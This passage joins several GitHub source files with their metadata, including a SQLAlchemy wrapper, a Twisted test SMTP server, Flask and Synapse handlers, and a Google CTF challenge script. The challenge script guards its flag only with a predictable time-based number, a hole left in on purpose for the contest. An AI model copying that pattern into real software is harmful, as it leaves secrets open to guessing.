"bytes": "2142"
},
{
"name": "HTML",
"bytes": "43874"
},
{
"name": "JavaScript",
"bytes": "3841"
},
{
"name": "Python",
"bytes": "76302"
},
{
"name": "Shell",
"bytes": "4188"
}
],
"symlink_target": ""
}
|
"""
"""
from collections import namedtuple
import inspect
import logging
from sqlalchemy import inspect as sqinspect
from sqlalchemy.exc import NoInspectionAvailable
from sqlalchemy.ext.associationproxy import AssociationProxy
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.orm import ColumnProperty, Query
from sqlalchemy.orm.attributes import QueryableAttribute
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy.orm.interfaces import MapperProperty
from sqlalchemy.orm.properties import RelationshipProperty
from sqlalchemy.sql.operators import is_ordering_modifier
from sqlalchemy.util import memoized_property
__author__ = 'Martin Martimeo <martin@martimeo.de>'
__date__ = '27.04.13 - 00:14'
def _filter(instance, condition) -> dict:
"""
    Filter properties of instance based on condition
:param instance:
:param condition:
:rtype: dict
"""
# Use iterate_properties when available
if hasattr(instance, 'iterate_properties'):
return {field.key: field for field in instance.iterate_properties
if condition(field)}
# Try sqlalchemy inspection
try:
inspection = sqinspect(instance)
if hasattr(inspection, "all_orm_descriptors"):
return {field.key: field for key, field in inspection.all_orm_descriptors.items()
if condition(field)}
elif hasattr(inspection, "attrs"):
return {field.key: field for key, field in inspection.attrs.items()
if condition(field)}
else:
raise NoInspectionAvailable()
# Use Inspect
except NoInspectionAvailable:
return {field.key: field for key, field in inspect.getmembers(instance)
if condition(field)}
def _is_ordering_expression(expression):
"""
Test an expression whether it is an ordering clause
"""
if hasattr(expression, 'operator') and is_ordering_modifier(expression.operator):
return True
if hasattr(expression, 'modifier') and is_ordering_modifier(expression.modifier):
return True
return False
class ModelWrapper(object):
"""
Wrapper around sqlalchemy model for having some easier functions
"""
def __init__(self, model):
self.model = model
@property
def __name__(self):
return self.model.__name__
@property
def __tablename__(self):
return self.model.__tablename__
@property
def __collectionname__(self):
try:
return self.model.__collectionname__
except AttributeError:
logging.warning("Missing collection name for %s using tablename" % self.model.__name__)
return self.model.__tablename__
@staticmethod
def get_primary_keys(instance) -> dict:
"""
Returns the primary keys
Inspired by flask-restless.helpers.primary_key_names
"""
return _filter(instance, lambda field: isinstance(field, ColumnProperty) and field.primary_key or (
isinstance(field, QueryableAttribute) and isinstance(field.property, ColumnProperty) and
hasattr(field.property.columns[0], 'primary_key') and field.property.columns[0].primary_key))
@memoized_property
def primary_keys(self):
"""
@see get_primary_keys
"""
return self.get_primary_keys(self.model)
primary_keys.__doc__ = get_primary_keys.__func__.__doc__
@staticmethod
def get_unique_keys(instance) -> dict:
"""
        Returns the unique keys
Inspired by flask-restless.helpers.primary_key_names
"""
return _filter(instance, lambda field: isinstance(field, ColumnProperty) and field.unique or (
isinstance(field, QueryableAttribute) and isinstance(field.property, ColumnProperty) and
hasattr(field.property.columns[0], 'unique') and field.property.columns[0].unique))
@memoized_property
def unique_keys(self):
"""
        @see get_unique_keys
"""
return self.get_unique_keys(self.model)
unique_keys.__doc__ = get_unique_keys.__func__.__doc__
@staticmethod
    def get_foreign_keys(instance) -> dict:
"""
Returns the foreign keys
Inspired by flask-restless.helpers.primary_key_names
"""
return {field.key: field for key, field in inspect.getmembers(instance)
if isinstance(field, QueryableAttribute)
and isinstance(field.property, ColumnProperty)
and field.foreign_keys}
@memoized_property
def foreign_keys(self):
"""
@see get_foreign_keys
"""
return self.get_foreign_keys(self.model)
foreign_keys.__doc__ = get_foreign_keys.__func__.__doc__
@staticmethod
def get_columns(instance) -> dict:
"""
        Returns the column objects of the model
"""
return _filter(instance, lambda field: isinstance(field, ColumnProperty) or (
isinstance(field, QueryableAttribute) and isinstance(field.property, ColumnProperty)))
@memoized_property
def columns(self):
"""
@see get_columns
"""
return self.get_columns(self.model)
columns.__doc__ = get_columns.__func__.__doc__
@staticmethod
def get_attributes(instance) -> dict:
"""
Returns the attributes of the model
"""
return _filter(instance,
lambda field: isinstance(field, MapperProperty) or isinstance(field, QueryableAttribute))
@memoized_property
def attributes(self):
"""
@see get_attributes
"""
return self.get_attributes(self.model)
attributes.__doc__ = get_attributes.__func__.__doc__
@staticmethod
def get_relations(instance) -> dict:
"""
        Returns the relation objects of the model
"""
return _filter(instance, lambda field: isinstance(field, RelationshipProperty) or (
isinstance(field, QueryableAttribute) and isinstance(field.property, RelationshipProperty)))
@memoized_property
def relations(self):
"""
@see get_relations
"""
return self.get_relations(self.model)
relations.__doc__ = get_relations.__func__.__doc__
@staticmethod
def get_hybrids(instance) -> list:
"""
        Returns the hybrid properties of the model
"""
Proxy = namedtuple('Proxy', ['key', 'field'])
# Try sqlalchemy inspection
try:
return [Proxy(key, field) for key, field in sqinspect(instance).all_orm_descriptors.items()
if isinstance(field, hybrid_property)]
# Use Inspect
except NoInspectionAvailable:
return [Proxy(key, field) for key, field in inspect.getmembers(instance)
if isinstance(field, hybrid_property)]
@memoized_property
def hybrids(self) -> list:
"""
@see get_hybrids
"""
return self.get_hybrids(self.model)
hybrids.__doc__ = get_hybrids.__func__.__doc__
@staticmethod
def get_proxies(instance) -> list:
"""
        Returns the association proxy objects of the model
Inspired by https://groups.google.com/forum/?fromgroups=#!topic/sqlalchemy/aDi_M4iH7d0
"""
Proxy = namedtuple('Proxy', ['key', 'field'])
if hasattr(instance, 'iterate_properties'):
return [Proxy(key, field) for key, field in sqinspect(instance).all_orm_descriptors.items()
if isinstance(field, AssociationProxy)]
else:
return [Proxy(key, field) for key, field in inspect.getmembers(instance)
if isinstance(field, AssociationProxy)]
@memoized_property
def proxies(self):
"""
@see get_proxies
"""
return self.get_proxies(self.model)
proxies.__doc__ = get_proxies.__func__.__doc__
class SessionedModelWrapper(ModelWrapper):
"""
Wrapper around sqlalchemy model for having some easier functions
"""
def __init__(self, model, session):
super().__init__(model)
self.session = session
@staticmethod
def _apply_kwargs(instance: Query, **kwargs) -> Query:
for expression in kwargs.pop('filters', []):
if _is_ordering_expression(expression):
instance = instance.order_by(expression)
else:
instance = instance.filter(expression)
if 'offset' in kwargs:
offset = kwargs.pop('offset')
foffset = lambda instance: instance.offset(offset)
else:
foffset = lambda instance: instance
if 'limit' in kwargs:
limit = kwargs.pop('limit')
flimit = lambda instance: instance.limit(limit)
else:
flimit = lambda instance: instance
instance = instance.filter_by(**kwargs)
instance = foffset(instance)
instance = flimit(instance)
return instance
def one(self, filters: list=(), **kwargs) -> object:
"""
Gets one instance of the model filtered by filters
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).one()
def all(self, filters: list=(), **kwargs) -> list:
"""
Gets all instances of the query instance
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword limit: Limit for request
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).all()
def update(self, values: dict, filters: list=(), **kwargs) -> int:
"""
Updates all instances of the model filtered by filters
:param values: Dictionary of values
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword limit: Limit for request
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).update(values)
def delete(self, filters: list=(), **kwargs) -> int:
"""
Delete all instances of the model filtered by filters
:param values: Dictionary of values
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
:keyword limit: Limit for request
:keyword offset: Offset for request
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).delete()
def count(self, filters: list=(), **kwargs) -> int:
"""
Gets the instance count
:param filters: Filters and OrderBy Clauses
:param kwargs: Additional filters passed to filter_by
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
return SessionedModelWrapper._apply_kwargs(instance, filters=filters, **kwargs).order_by(False).count()
def get(self, *pargs) -> object:
"""
Gets one instance of the model based on primary_keys
:param pargs: ident
:raise NoResultFound: If no element has been received
"""
if isinstance(self, SessionedModelWrapper):
instance = self.session.query(self.model)
else:
instance = self
if not isinstance(pargs, tuple):
rtn = instance.get(*pargs)
else:
rtn = instance.get(pargs)
if not rtn:
            raise NoResultFound("No element received for %s(%s)" % (self.__collectionname__, pargs))
return rtn
def __call__(self, **kwargs):
instance = self.model()
for key, value in kwargs.items():
setattr(instance, key, value)
self.session.add(instance)
return instance
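# Usage sketch (assumes a SQLAlchemy declarative model `User` and an open
# `session`; these names are illustrative, not part of this module):
#
#     wrapper = SessionedModelWrapper(User, session)
#     actives = wrapper.all(filters=[User.active == True], limit=10)
#     total = wrapper.count()
#     alice = wrapper.one(name="alice")
#     bob = wrapper(name="bob")  # instantiates, populates and session.add()s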
|
{
"content_hash": "d8f8b1994ebcb7d41d322357c7c6bb5a",
"timestamp": "",
"source": "github",
"line_count": 395,
"max_line_length": 112,
"avg_line_length": 32.81518987341772,
"alnum_prop": 0.6113254127449468,
"repo_name": "tornado-utils/tornado-restless",
"id": "e048828c29d1a5db1f4fcb50aa443ac68722cc1f",
"size": "13006",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tornado_restless/wrapper.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "75851"
}
],
"symlink_target": ""
}
|
import sys
import os
import random
import time
FLAG = os.environ["TASK1_FLAG"]
OFFSET = random.randint(38, 42)
def get_correct():
return int(time.time()) + OFFSET
print("Download path <game server>/0c16c4dd438b0042c4d725fab588e648.py\n")
print("Oh! Look what time it is: " + str(int(time.time())))
print("Yes! It's guessing o'clock!")
while True:
try:
s = input("Now, tell me the number I'm thinking about: ")
v = int(s.strip())
if v != get_correct():
print("Hahaha. No.")
continue
print(FLAG)
break
except ValueError:
print("That's not a number, go away.")
break
except EOFError:
print("Ohes Noes!")
break
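# Note: the expected answer is int(time.time()) + OFFSET, and OFFSET is fixed
# for the lifetime of the process, so each guess has roughly a one-second
# window of validity.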
|
{
"content_hash": "05f53ae141ec5f1428ebfc557a2af96d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 74,
"avg_line_length": 19.2,
"alnum_prop": 0.6428571428571429,
"repo_name": "google/google-ctf",
"id": "c2ae5dde8219d16f045790789944fa618e63ab76",
"size": "691",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "2020/hackceler8/match-pre-package/game/static/0c16c4dd438b0042c4d725fab588e648.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "AIDL",
"bytes": "508"
},
{
"name": "Assembly",
"bytes": "107617"
},
{
"name": "BASIC",
"bytes": "6068"
},
{
"name": "Batchfile",
"bytes": "1032"
},
{
"name": "Blade",
"bytes": "14530"
},
{
"name": "C",
"bytes": "1481904"
},
{
"name": "C++",
"bytes": "2139472"
},
{
"name": "CMake",
"bytes": "11595"
},
{
"name": "CSS",
"bytes": "172375"
},
{
"name": "Dart",
"bytes": "6282"
},
{
"name": "Dockerfile",
"bytes": "232352"
},
{
"name": "EJS",
"bytes": "92308"
},
{
"name": "Emacs Lisp",
"bytes": "2668"
},
{
"name": "GDB",
"bytes": "273"
},
{
"name": "GLSL",
"bytes": "33392"
},
{
"name": "Go",
"bytes": "3031142"
},
{
"name": "HTML",
"bytes": "467647"
},
{
"name": "Java",
"bytes": "174199"
},
{
"name": "JavaScript",
"bytes": "2643200"
},
{
"name": "Lua",
"bytes": "5944"
},
{
"name": "Makefile",
"bytes": "149152"
},
{
"name": "NSIS",
"bytes": "2800"
},
{
"name": "Nix",
"bytes": "139"
},
{
"name": "PHP",
"bytes": "311900"
},
{
"name": "Perl",
"bytes": "32742"
},
{
"name": "Pug",
"bytes": "8752"
},
{
"name": "Python",
"bytes": "1756592"
},
{
"name": "Red",
"bytes": "188"
},
{
"name": "Rust",
"bytes": "541267"
},
{
"name": "Sage",
"bytes": "39814"
},
{
"name": "Shell",
"bytes": "382149"
},
{
"name": "Smali",
"bytes": "2316656"
},
{
"name": "Starlark",
"bytes": "8216"
},
{
"name": "SystemVerilog",
"bytes": "16466"
},
{
"name": "VCL",
"bytes": "895"
},
{
"name": "Verilog",
"bytes": "7230"
},
{
"name": "Vim Script",
"bytes": "890"
},
{
"name": "Vue",
"bytes": "10248"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import os
import sys
from setuptools import Command, setup
from setuptools.command.test import test as TestCommand
from fabulist import __version__
# Override 'setup.py test' command
class ToxCommand(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# Import here, cause outside the eggs aren't loaded
import tox
errcode = tox.cmdline(self.test_args)
sys.exit(errcode)
# Add custom command 'setup.py sphinx'
# See https://dankeder.com/posts/adding-custom-commands-to-setup-py/
# and http://stackoverflow.com/a/22273180/19166
class SphinxCommand(Command):
user_options = []
description = "Build docs using Sphinx"
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import subprocess
# sourcedir = os.path.join("docs", "sphinx")
outdir = os.path.join("docs", "sphinx-build")
res = subprocess.call(
"sphinx-build -b html docs/sphinx docs/sphinx-build", shell=True
)
if res:
print("ERROR: sphinx-build exited with code {}".format(res))
else:
print("Documentation created at {}.".format(os.path.abspath(outdir)))
try:
readme = open("README.md", "rt").read()
# readme = open("readme_pypi.rst", "rt").read()
except IOError:
readme = "(readme not found. Running from tox/setup.py test?)"
try:
from cx_Freeze import Executable, setup # noqa
executables = [
Executable(
script="fabulist/fabulist.py",
base=None,
targetName="fabulist.exe",
# icon= "doc/logo.ico",
shortcutName="fabulist",
)
]
except ImportError:
    # tox has problems installing cx_Freeze into its venvs, but it is not needed
# for the tests anyway
print(
"Could not import cx_Freeze; 'build' and 'bdist' commands will not be available."
)
print("See https://pypi.python.org/pypi/cx_Freeze")
executables = []
# # 'setup.py upload' fails on Vista, because .pypirc is searched on 'HOME' path
# if not "HOME" in os.environ and "HOMEPATH" in os.environ:
# os.environ.setdefault("HOME", os.environ.get("HOMEPATH", ""))
# print("Initializing HOME environment variable to '{}'".format(os.environ["HOME"]))
install_requires = []
tests_require = [
"pytest",
"pytest-cov",
"tox",
"virtualenv",
]
setup_requires = install_requires
build_exe_options = {
"init_script": "Console",
"includes": install_requires,
"packages": [],
"constants": "BUILD_COPYRIGHT='(c) 2017 Martin Wendt'",
}
bdist_msi_options = {
"upgrade_code": "{69D828C9-7AA2-4822-901E-0BA7E6D1EBE3}",
"add_to_path": True,
# TODO: configure target dir
# "initial_target_dir": r"[ProgramFilesFolder]\%s\%s" % (company_name, product_name),
# TODO: configure shortcuts:
# http://stackoverflow.com/a/15736406/19166
}
setup(
name="fabulist",
version=__version__,
author="Martin Wendt",
author_email="fabulist@wwwendt.de",
# copyright="(c) 2017 Martin Wendt",
maintainer="Martin Wendt",
maintainer_email="fabulist@wwwendt.de",
url="https://github.com/mar10/fabulist",
description="Generate random strings that make sense.",
long_description=readme,
long_description_content_type="text/markdown",
# Development Status :: 2 - Pre-Alpha
# Development Status :: 3 - Alpha
# Development Status :: 4 - Beta
# Development Status :: 5 - Production/Stable
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Information Technology",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
# "Programming Language :: Python :: 3.4",
# "Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities",
],
keywords="python test-data word-list generator mock",
license="The MIT License",
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
packages=["fabulist"],
package_data={"fabulist": ["data/*.txt"]},
zip_safe=False,
extras_require={},
cmdclass={
"test": ToxCommand,
"sphinx": SphinxCommand,
},
# entry_points = {
# "console_scripts" : ["fabulist = fabulist.fabulist:run"],
# },
executables=executables,
options={
"build_exe": build_exe_options,
"bdist_msi": bdist_msi_options,
},
)
|
{
"content_hash": "bbb2997af3d62983c3f37a2c898e1fea",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 89,
"avg_line_length": 30.041176470588237,
"alnum_prop": 0.6205208537301743,
"repo_name": "mar10/fabulist",
"id": "fda5cddef76f3d8598ae46d3329169d6de156cf2",
"size": "5130",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "69429"
}
],
"symlink_target": ""
}
|
import os
import sys
import warnings
import django
from django.test.runner import DiscoverRunner
warnings.simplefilter('always')
os.environ['DJANGO_SETTINGS_MODULE'] = 'password_reset.tests.settings'
def runtests():
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
django.setup()
runner = DiscoverRunner(verbosity=1, interactive=True,
failfast=bool(os.environ.get('FAILFAST')))
failures = runner.run_tests(())
sys.exit(failures)
if __name__ == '__main__':
runtests()
|
{
"content_hash": "dd7afc9f6e36ffc5791850e78201848e",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 70,
"avg_line_length": 21.615384615384617,
"alnum_prop": 0.6654804270462633,
"repo_name": "brutasse/django-password-reset",
"id": "8995ca540cdf8b8bbcfc3c3fefb9a4f0e8bfe0ee",
"size": "584",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runtests.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "1659"
},
{
"name": "Python",
"bytes": "31957"
}
],
"symlink_target": ""
}
|
import threading
import time
import json
from twisted.internet import reactor, ssl
from twisted.internet.protocol import ServerFactory
from twisted.protocols.basic import LineReceiver
class TLSFactory(ServerFactory):
mailcontent = []
communication = []
tlsCert = None
tlsKey = None
class TLSServer(LineReceiver):
inData = False
def connectionMade(self):
self.sendLine("220 this.mx ESMTP Dev Server")
def lineReceived(self, line):
self.factory.communication.append(line)
if "ehlo" in line:
self.sendLine("250-this.mx at your service")
self.sendLine("250-SIZE 35882577")
self.sendLine("250-8BITMIME")
self.sendLine("250 STARTTLS")
return
if "starttls" in line.lower():
self.sendLine('220 Go ahead, i like TLS')
ctx = ssl.DefaultOpenSSLContextFactory(
privateKeyFileName=self.factory.tlsKey,
certificateFileName=self.factory.tlsCert,
sslmethod=ssl.SSL.SSLv23_METHOD)
self.transport.startTLS(ctx, self.factory)
return
if line == "quit":
self.sendLine("221 2.0.0 Bye")
self.stopProducing()
if not "data" in line:
if not self.inData:
self.sendLine("250 OK")
return
if line == ".":
self.inData = False
self.sendLine("250 2.0.0 OK, MESSAGE ACCEPTED")
else:
self.factory.mailcontent.append(line)
else:
self.sendLine("354 End data with <CR><LF>.<CR><LF>")
self.inData = True
def connectionLost(self, reason=None):
self.transport.loseConnection()
reactor.stop()
class SMTPDevServer(object):
port = None
timeout = None
tlsCert = None
tlsKey = None
def __init__(self, port=22525, timeout=None, tlscert=None, tlskey=None):
self.port = port
self.timeout = timeout
self.tlsCert = tlscert
self.tlsKey = tlskey
def receiveOneMail(self):
factory = TLSFactory()
factory.tlsCert = self.tlsCert
factory.tlsKey = self.tlsKey
factory.protocol = TLSServer
reactor.listenTCP(self.port, factory)
# setting up thread to check timeout
if self.timeout:
self._thread_stop = threading.Event()
t = threading.Thread(target=self._timeoutCounter, args=())
t.daemon = True
t.start()
#reactor.addSystemEventTrigger('before', 'shutdown', reactor.disconnectAll)
reactor.run()
self._thread_stop.set()
return {"communication": factory.communication, "rawmail": factory.mailcontent}
def _timeoutCounter(self):
timeWaited = 0
while True:
time.sleep(1)
timeWaited += 1
if timeWaited >= self.timeout:
print "Waiting for mail timeout, shutting down reactor"
break
reactor.callFromThread(reactor.stop)
if __name__ == '__main__':
smtp = SMTPDevServer(port=22525, timeout=10, tlscert='certs/server.crt', tlskey='certs/server.key')
data = smtp.receiveOneMail()
print json.dumps(data, indent=2)
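# Manual test sketch (assumes the cert/key files exist): any STARTTLS-capable
# client works, e.g.
#   openssl s_client -connect localhost:22525 -starttls smtp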
|
{
"content_hash": "70951a3ba29a990af2caa6aee8676cae",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 103,
"avg_line_length": 30.027027027027028,
"alnum_prop": 0.5853585358535853,
"repo_name": "tspycher/python-devtlssmtpserver",
"id": "10aff1b883e0ab6cc64f26059bf424e1886edccb",
"size": "3333",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/devtlssmtpserver/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7164"
}
],
"symlink_target": ""
}
|
from flask import request, session, g, redirect, url_for, abort
from . import api
from ..exceptions import ExistsError
from ..models import Category, Sub
from .main import BaseMethodView
class SubListView(BaseMethodView):
def get(self):
_subs = Sub.all()
subs = []
for sub in _subs:
sub.threads = Sub.get_threads(sub.id)
subs.append(sub)
return subs
def post(self):
self.is_admin()
data = request.json
if not 'description' in data:
data['description'] = ''
missing_data = self.missing_data(['category', 'title'])
if missing_data:
return missing_data
category = Category.get(request.json['category'])
if not category:
return self.error('Category not found', 404)
try:
sub = Sub.create(category, title=data['title'],
description=data['description'])
except ExistsError:
return self.error('Sub exists', 409)
return sub, 201
class SubDetailView(BaseMethodView):
model = Sub
def get(self, id):
sub = self.get_or_404(id)
sub.threads = Sub.get_threads(sub.id)
return sub
def put(self, id):
self.is_admin()
sub = self.get_or_404(id)
missing_data = self.missing_data(['title'])
if missing_data:
return missing_data
sub = Sub.edit(id, **request.json)
return sub, 200
def delete(self, id):
self.is_admin()
self.get_or_404(id)
Sub.delete(id)
return '', 200
list_view = SubListView.as_view('sub_list')
detail_view = SubDetailView.as_view('sub_detail')
api.add_url_rule('/sub/', view_func=list_view, methods=['GET', 'POST'])
api.add_url_rule('/sub/<int:id>/', view_func=detail_view,
methods=['GET', 'PUT', 'DELETE'])
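# A brief usage sketch (hypothetical client code; paths are relative to
# wherever the `api` blueprint is mounted, and an admin session is assumed):
#
#   client = app.test_client()
#   client.get('/sub/')                                      # list all subs
#   client.post('/sub/', json={'category': 1, 'title': 'General'})
#   client.get('/sub/1/')                                    # detail view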
|
{
"content_hash": "1d814ab4409f86d18501845cab00a5c9",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 71,
"avg_line_length": 26.430555555555557,
"alnum_prop": 0.5717288491854966,
"repo_name": "spaceexperiment/forum-app",
"id": "789ff704c7e81df8d3a95cdbaae2e322b4af438d",
"size": "1903",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api/views/sub.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2306"
},
{
"name": "CoffeeScript",
"bytes": "1277"
},
{
"name": "JavaScript",
"bytes": "239"
},
{
"name": "Python",
"bytes": "73174"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ui', '0010_auto_20161118_0002'),
]
operations = [
migrations.AddField(
model_name='export',
name='export_segment_size',
            field=models.BigIntegerField(default=250000, help_text=b'Number of items per file.', null=True, blank=True, choices=[(100000, b'100,000'), (250000, b'250,000'), (500000, b'500,000'), (1000000, b'1,000,000'), (None, b'Single file'), (100, b'100')]),
),
]
|
{
"content_hash": "b4ead188c81c7106a5be53c69fcd1e9b",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 262,
"avg_line_length": 33.111111111111114,
"alnum_prop": 0.6140939597315436,
"repo_name": "gwu-libraries/sfm",
"id": "1f411c3b3d3caef125c848aaf0cfb118870c37f0",
"size": "620",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sfm/ui/migrations/0011_export_export_segment_size.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "18062"
},
{
"name": "Python",
"bytes": "79138"
},
{
"name": "Shell",
"bytes": "4507"
}
],
"symlink_target": ""
}
|
"""Utilities for interacting with Identity Servers"""
from twisted.internet import defer
from synapse.api.errors import (
CodeMessageException
)
from ._base import BaseHandler
from synapse.util.async import run_on_reactor
from synapse.api.errors import SynapseError, Codes
import json
import logging
logger = logging.getLogger(__name__)
class IdentityHandler(BaseHandler):
def __init__(self, hs):
super(IdentityHandler, self).__init__(hs)
self.http_client = hs.get_simple_http_client()
self.trusted_id_servers = set(hs.config.trusted_third_party_id_servers)
self.trust_any_id_server_just_for_testing_do_not_use = (
hs.config.use_insecure_ssl_client_just_for_testing_do_not_use
)
def _should_trust_id_server(self, id_server):
if id_server not in self.trusted_id_servers:
if self.trust_any_id_server_just_for_testing_do_not_use:
logger.warn(
"Trusting untrustworthy ID server %r even though it isn't"
" in the trusted id list for testing because"
" 'use_insecure_ssl_client_just_for_testing_do_not_use'"
" is set in the config",
id_server,
)
else:
return False
return True
@defer.inlineCallbacks
def threepid_from_creds(self, creds):
yield run_on_reactor()
if 'id_server' in creds:
id_server = creds['id_server']
elif 'idServer' in creds:
id_server = creds['idServer']
else:
raise SynapseError(400, "No id_server in creds")
if 'client_secret' in creds:
client_secret = creds['client_secret']
elif 'clientSecret' in creds:
client_secret = creds['clientSecret']
else:
raise SynapseError(400, "No client_secret in creds")
if not self._should_trust_id_server(id_server):
            logger.warn(
                "%s is not a trusted ID server: rejecting 3pid credentials",
                id_server
            )
defer.returnValue(None)
data = {}
try:
data = yield self.http_client.get_json(
"https://%s%s" % (
id_server,
"/_matrix/identity/api/v1/3pid/getValidated3pid"
),
{'sid': creds['sid'], 'client_secret': client_secret}
)
except CodeMessageException as e:
data = json.loads(e.msg)
if 'medium' in data:
defer.returnValue(data)
defer.returnValue(None)
@defer.inlineCallbacks
def bind_threepid(self, creds, mxid):
yield run_on_reactor()
logger.debug("binding threepid %r to %s", creds, mxid)
data = None
if 'id_server' in creds:
id_server = creds['id_server']
elif 'idServer' in creds:
id_server = creds['idServer']
else:
raise SynapseError(400, "No id_server in creds")
if 'client_secret' in creds:
client_secret = creds['client_secret']
elif 'clientSecret' in creds:
client_secret = creds['clientSecret']
else:
raise SynapseError(400, "No client_secret in creds")
try:
data = yield self.http_client.post_urlencoded_get_json(
"https://%s%s" % (
id_server, "/_matrix/identity/api/v1/3pid/bind"
),
{
'sid': creds['sid'],
'client_secret': client_secret,
'mxid': mxid,
}
)
logger.debug("bound threepid %r to %s", creds, mxid)
except CodeMessageException as e:
data = json.loads(e.msg)
defer.returnValue(data)
@defer.inlineCallbacks
def requestEmailToken(self, id_server, email, client_secret, send_attempt, **kwargs):
yield run_on_reactor()
if not self._should_trust_id_server(id_server):
raise SynapseError(
400, "Untrusted ID server '%s'" % id_server,
Codes.SERVER_NOT_TRUSTED
)
params = {
'email': email,
'client_secret': client_secret,
'send_attempt': send_attempt,
}
params.update(kwargs)
try:
data = yield self.http_client.post_urlencoded_get_json(
"https://%s%s" % (
id_server,
"/_matrix/identity/api/v1/validate/email/requestToken"
),
params
)
defer.returnValue(data)
except CodeMessageException as e:
logger.info("Proxied requestToken failed: %r", e)
raise e
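# For reference, the ``creds`` mapping consumed by threepid_from_creds and
# bind_threepid above has this shape (both spellings of each key are
# accepted; the values here are placeholders):
#
#   creds = {
#       "id_server": "id.example.com",
#       "client_secret": "<opaque secret>",
#       "sid": "<session id>",
#   }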
|
{
"content_hash": "dcb6b90d269cf118f728ff43a020c155",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 89,
"avg_line_length": 32.75675675675676,
"alnum_prop": 0.5377475247524752,
"repo_name": "TribeMedia/synapse",
"id": "559e5d5a716a3aafe2ded2c1eb640d22f9c2af98",
"size": "5457",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "synapse/handlers/identity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "4376"
},
{
"name": "HTML",
"bytes": "9046"
},
{
"name": "JavaScript",
"bytes": "176441"
},
{
"name": "Perl",
"bytes": "31852"
},
{
"name": "Python",
"bytes": "2748398"
},
{
"name": "Shell",
"bytes": "7827"
}
],
"symlink_target": ""
}
|
"""Config flow to configure Xiaomi Miio."""
from __future__ import annotations
from collections.abc import Mapping
import logging
from re import search
from typing import Any
from micloud import MiCloud
from micloud.micloudexception import MiCloudAccessDenied
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import zeroconf
from homeassistant.config_entries import SOURCE_REAUTH, ConfigEntry
from homeassistant.const import CONF_HOST, CONF_MODEL, CONF_TOKEN
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.device_registry import format_mac
from .const import (
CONF_CLOUD_COUNTRY,
CONF_CLOUD_PASSWORD,
CONF_CLOUD_SUBDEVICES,
CONF_CLOUD_USERNAME,
CONF_DEVICE,
CONF_FLOW_TYPE,
CONF_GATEWAY,
CONF_MAC,
CONF_MANUAL,
DEFAULT_CLOUD_COUNTRY,
DOMAIN,
MODELS_ALL,
MODELS_ALL_DEVICES,
MODELS_GATEWAY,
SERVER_COUNTRY_CODES,
AuthException,
SetupException,
)
from .device import ConnectXiaomiDevice
_LOGGER = logging.getLogger(__name__)
DEVICE_SETTINGS = {
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
}
